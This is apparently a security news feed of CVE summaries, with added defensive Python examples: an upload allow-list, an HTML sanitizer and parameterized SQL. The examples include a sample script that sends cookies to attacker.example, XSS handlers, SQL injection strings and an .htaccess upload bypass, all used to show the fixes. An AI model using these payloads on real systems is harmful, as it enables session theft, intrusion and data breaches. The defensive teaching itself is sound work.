‼ CVE-2021-28428 ‼
File upload vulnerability in HorizontCMS before 1.0.0-beta.3 via uploading a .htaccess file and *.hello files using the Media Files upload functionality. The original file upload vulnerability (CVE-2020-27387) was remediated by restricting PHP extensions; however, that filter can be bypassed by uploading an arbitrary .htaccess file together with *.hello files in order to execute PHP code and gain RCE.
via "National Vulnerability Database".
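The HorizontCMS entry is the textbook failure of an extension deny-list: the check looks only for PHP-ish extensions, so a dot-file like .htaccess and an unknown extension like .hello both sail through. The following is an added example (not HorizontCMS code) contrasting that deny-list with an allow-list that rejects server-configuration names by name, requires a canonical filename shape, and checks the leading bytes of the content; the filenames and byte strings are constructed, and the `AddType` directive mentioned in the comment is the assumed content of the uploaded .htaccess, not something the advisory states.

```python
"""Upload-filter bypass of the CVE-2021-28428 kind: a deny-list of PHP
extensions versus an allow-list with server-config names blocked.

Added example, not HorizontCMS code. Filenames and byte strings are
constructed; the .htaccess directive is the assumed bypass mechanism.
"""
import os
import re
from typing import Tuple

# First-fix style (CVE-2020-27387): reject files whose extension is PHP-ish.
PHP_DENYLIST = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}


def denylist_allows(filename: str) -> bool:
    """Vulnerable check. '.htaccess' yields extension 'htaccess' and
    'shell.hello' yields 'hello'; neither is on the list, so both pass,
    although an uploaded .htaccess containing (assumed)
    `AddType application/x-httpd-php .hello` makes Apache run every
    *.hello file in that directory as PHP."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in PHP_DENYLIST


# Hardened check: only types we know how to validate, and only names whose
# shape we control. Server configuration files are rejected by name.
ALLOWED_MEDIA = {"png", "jpg", "jpeg", "gif", "pdf"}
SERVER_CONFIG_NAMES = {".htaccess", ".htpasswd", ".user.ini", "web.config", "php.ini"}
# Exactly one dot, so 'shell.php.png' and dot-prefixed names never match.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,100}\.([A-Za-z0-9]{1,5})$")
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}


def allowlist_accepts(filename: str) -> Tuple[bool, str]:
    """Name gate: basename only, canonical shape, extension on the allow-list.
    Returns (True, extension) or (False, reason)."""
    name = os.path.basename(filename.replace("\\", "/"))
    if name.lower() in SERVER_CONFIG_NAMES:
        return False, "server configuration file"
    m = SAFE_NAME.match(name)
    if not m:
        return False, "name not in canonical form"
    ext = m.group(1).lower()
    if ext not in ALLOWED_MEDIA:
        return False, f"extension .{ext} not allowed"
    return True, ext


def content_matches(data: bytes, ext: str) -> bool:
    """Content gate: leading bytes must match the declared type.
    Types without a known signature fail closed."""
    sig = MAGIC.get(ext)
    return sig is not None and data.startswith(sig)


def accept_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Both gates must pass. The file should then be stored under a
    server-generated name in a directory with script execution disabled."""
    ok, info = allowlist_accepts(filename)
    if not ok:
        return False, info
    if not content_matches(data, info):
        return False, f"content does not look like .{info}"
    return True, info
```

The deny-list fails open for anything it has not heard of; the allow-list fails closed, and the name check removes the whole class of "configuration file dropped into the upload directory" rather than enumerating config filenames only. The content check is a second, independent gate: a PHP stub renamed to photo.png is rejected even though its name is acceptable.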
‼ CVE-2022-24978 ‼
Zoho ManageEngine ADAudit Plus before 7055 allows authenticated privilege escalation on integrated products. This occurs because a password field is present in a JSON response.
via "National Vulnerability Database".
‼ CVE-2022-25245 ‼
Zoho ManageEngine ServiceDesk Plus before 13001 allows anyone to learn the organisation's default currency name.
via "National Vulnerability Database".
‼ CVE-2022-26630 ‼
Jellycms v3.8.1 and below was discovered to contain an arbitrary file upload vulnerability via \app.\admin\Controllers\db.php.
via "National Vulnerability Database".
‼ CVE-2022-28219 ‼
Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an unauthenticated XXE attack that leads to Remote Code Execution.
via "National Vulnerability Database".
‼ CVE-2022-28651 ‼
In JetBrains IntelliJ IDEA before 2021.3.3 it was possible to get passwords from protected fields.
via "National Vulnerability Database".
‼ CVE-2022-24811 ‼
Combodo iTop is a web based IT Service Management tool. Prior to versions 2.7.6 and 3.0.0, cross-site scripting is possible for scripts outside of script tags when displaying HTML attachments. This issue is fixed in versions 2.7.6 and 3.0.0. There are currently no known workarounds.
via "National Vulnerability Database".
‼ CVE-2022-28648 ‼
In JetBrains YouTrack before 2022.1.43563, HTML code from the issue description was being rendered.
via "National Vulnerability Database".
‼ CVE-2022-1244 ‼
A heap-buffer-overflow in the GitHub repository radareorg/radare2 prior to 5.6.8. This vulnerability is capable of inducing denial of service.
via "National Vulnerability Database".
‼ CVE-2022-25373 ‼
Zoho ManageEngine SupportCenter Plus before 11020 allows Stored XSS in the request history.
via "National Vulnerability Database".
‼ CVE-2022-24780 ‼
Combodo iTop is a web based IT Service Management tool. In versions prior to 2.7.6 and 3.0.0, users of the iTop user portal can send TWIG code to the server by forging specific HTTP queries, and execute arbitrary code on the server with the HTTP server user's privileges. This issue is fixed in versions 2.7.6 and 3.0.0. There are currently no known workarounds.
via "National Vulnerability Database".
‼ CVE-2022-28650 ‼
In JetBrains YouTrack before 2022.1.43700 it was possible to inject JavaScript into Markdown in the YouTrack Classic UI.
via "National Vulnerability Database".
‼ CVE-2022-28649 ‼
In JetBrains YouTrack before 2022.1.43563 it was possible to include an iframe from a third-party domain in the issue description.
via "National Vulnerability Database".
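The three YouTrack entries (CVE-2022-28648, CVE-2022-28650 and CVE-2022-28649) are one problem seen from three sides: issue text reaches the browser as HTML, whether pasted raw or produced by a Markdown renderer, and the output is not reduced to a safe subset. The following is an added example, not JetBrains code, of an allow-list sanitizer run over the rendered HTML: unknown tags and attributes are dropped, `<script>`/`<style>` contents are discarded, link schemes are restricted, and an iframe survives only with an https `src` on a trusted host. The trusted host `youtrack.example.test` and the hostile sample description are constructed.

```python
"""Allow-list HTML sanitizer for user-supplied issue text, covering the three
YouTrack description issues above: raw HTML rendered, JavaScript injected via
Markdown, and iframes to third-party domains.

Added example, not JetBrains code. The trusted frame host and the sample
description are constructed.
"""
from html import escape
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urlparse

ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "code", "pre", "ul", "ol", "li", "br", "a", "iframe"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "iframe": {"src", "width", "height"}}
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link"}
TRUSTED_FRAME_HOSTS = {"youtrack.example.test"}  # assumption: first-party embeds only
RAW_TEXT_TAGS = {"script", "style"}  # their text content is dropped, not just the tags


class Sanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: List[str] = []
        self.dropped: List[str] = []       # audit trail of what was removed
        self.in_raw = False                 # inside <script>/<style>
        self.suppressed: List[str] = []     # dropped start tags; drop their end tags too

    @staticmethod
    def _url_ok(tag: str, value: str) -> bool:
        u = urlparse(value.strip())
        if tag == "iframe":
            return u.scheme == "https" and u.hostname in TRUSTED_FRAME_HOSTS
        return u.scheme in ("", "http", "https", "mailto")  # blocks javascript:, data:, vbscript:

    def _drop(self, tag: str) -> None:
        self.dropped.append(tag)
        if tag not in VOID_TAGS:
            self.suppressed.append(tag)

    def handle_starttag(self, tag, attrs):
        if self.in_raw:
            return
        if tag in RAW_TEXT_TAGS:
            self.in_raw = True
            self.dropped.append(tag)
            return
        if tag not in ALLOWED_TAGS:
            self._drop(tag)
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"{tag}@{name}")        # on* handlers, style, ...
            elif name in ("href", "src") and not self._url_ok(tag, value):
                self.dropped.append(f"{tag}@{name}={value}")
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        if tag == "iframe" and not any(k.startswith(" src=") for k in kept):
            self._drop(tag)  # an iframe without a trusted src is removed entirely
            return
        if tag == "a":
            kept.append(' rel="noopener noreferrer"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self.in_raw:
            if tag in RAW_TEXT_TAGS:
                self.in_raw = False
            return
        if tag in self.suppressed:
            self.suppressed.remove(tag)
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.in_raw:
            # Character references were decoded on input; re-escape on output.
            self.out.append(escape(data, quote=False))


def sanitize(html: str) -> Tuple[str, List[str]]:
    """Return (clean_html, list_of_dropped_items)."""
    s = Sanitizer()
    s.feed(html)
    s.close()
    return "".join(s.out), s.dropped


# Constructed hostile description exercising each of the three issues.
SAMPLE = (
    '<p onclick="alert(1)">Steps: <b>login</b></p>'
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    '<a href="javascript:alert(document.domain)">click</a>'
    '<iframe src="https://attacker.example/phish"></iframe>'
    '<iframe src="https://youtrack.example.test/embed/1"></iframe>'
    '<img src=x onerror="alert(2)">'
)
```

Two design points matter in practice. First, the sanitizer runs on the final HTML, after Markdown rendering, so a Markdown renderer that lets raw HTML through is no longer a bypass. Second, HTML comments are dropped by the parser's default handler and text is re-escaped on output, so a payload hidden in an entity-encoded form does not come back out as markup. Pair this with a Content-Security-Policy that forbids inline script as a second layer.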
🔏 New U.S. Cybersecurity Bureau Hopes to Help Shape Policy 🔏
The newly formed Bureau of Cyberspace and Digital Policy aims to address the challenges of cyberspace with policy based on emerging technology.
via "Digital Guardian".
🕴 'Human Behavior' Security Startup Nets $7M in Seed 🕴
Nudge Security plans a general launch of its cloud-based service later this year.
via "Dark Reading".
‼ CVE-2022-24475 ‼
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26900, CVE-2022-26908, CVE-2022-26909, CVE-2022-26912.
via "National Vulnerability Database".
‼ CVE-2022-23974 ‼
In Apache Pinot 0.9.3 and older versions, the segment upload path allowed segment directories to be imported into Pinot tables. In Pinot installations that allow open access to the controller, a specially crafted request can potentially be exploited to cause disruption of the Pinot service. Pinot release 0.10.0 fixes this. See https://docs.pinot.apache.org/basics/releases/0.10.0
via "National Vulnerability Database".
‼ CVE-2022-24523 ‼
Microsoft Edge (Chromium-based) Spoofing Vulnerability.
via "National Vulnerability Database".
‼ CVE-2022-27123 ‼
Employee Performance Evaluation v1.0 was discovered to contain a SQL injection vulnerability via the email parameter.
via "National Vulnerability Database".
‼ CVE-2022-27304 ‼
Student Grading System v1.0 was discovered to contain a SQL injection vulnerability via the user parameter.
via "National Vulnerability Database".
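The two entries above (CVE-2022-27123, via the email parameter, and CVE-2022-27304, via the user parameter) describe the same defect: a request parameter spliced into SQL text. The following is an added example, not code from either application, showing a string-built lookup beside its parameterized replacement against an in-memory SQLite table; the table, rows and attacker strings are constructed, and the plaintext passwords exist only to make the data exfiltration visible (a real system stores hashes).

```python
"""String-built SQL versus parameterized SQL for a lookup by e-mail or user
name, as in CVE-2022-27123 and CVE-2022-27304.

Added example, not code from either application. The table and rows are
constructed; real systems must store password hashes, not plaintext.
"""
import sqlite3
from typing import List, Optional, Tuple

Row = Tuple[int, str]


def make_db() -> sqlite3.Connection:
    """Constructed users table with two accounts."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT, role TEXT)"
    )
    con.executemany(
        "INSERT INTO users (email, password, role) VALUES (?, ?, ?)",
        [("alice@example.test", "hunter2", "admin"), ("bob@example.test", "s3cret", "user")],
    )
    return con


def login_vulnerable(con: sqlite3.Connection, email: str, password: str) -> List[Row]:
    """The bug: the parameter is spliced into the statement text, so a quote
    in it terminates the literal and the remainder is executed as SQL."""
    sql = (
        "SELECT id, role FROM users "
        f"WHERE email = '{email}' AND password = '{password}'"
    )
    return con.execute(sql).fetchall()


def login_parameterized(con: sqlite3.Connection, email: str, password: str) -> Optional[Row]:
    """The fix: placeholders keep the statement fixed; the driver passes the
    values separately, so a quote in the e-mail is just a character."""
    return con.execute(
        "SELECT id, role FROM users WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()


# Constructed attacker inputs for the e-mail (or user) parameter.
BYPASS = "' OR 1=1 --"                                  # authenticate as the first row
DUMP = "' UNION SELECT password, role FROM users --"    # pull other columns into the result
```

With `BYPASS` the vulnerable query becomes `... WHERE email = '' OR 1=1 --' AND password = '...'`: the password check is commented out and every row matches, the first of which is the admin. With `DUMP` the `UNION` replaces the expected `(id, role)` rows with `(password, role)` pairs, which is how a "login" bug turns into a data breach. The parameterized version returns nothing for either string because the whole value is compared literally to the email column.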
‼ CVE-2022-26900 ‼
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24475, CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26908, CVE-2022-26909, CVE-2022-26912.
via "National Vulnerability Database".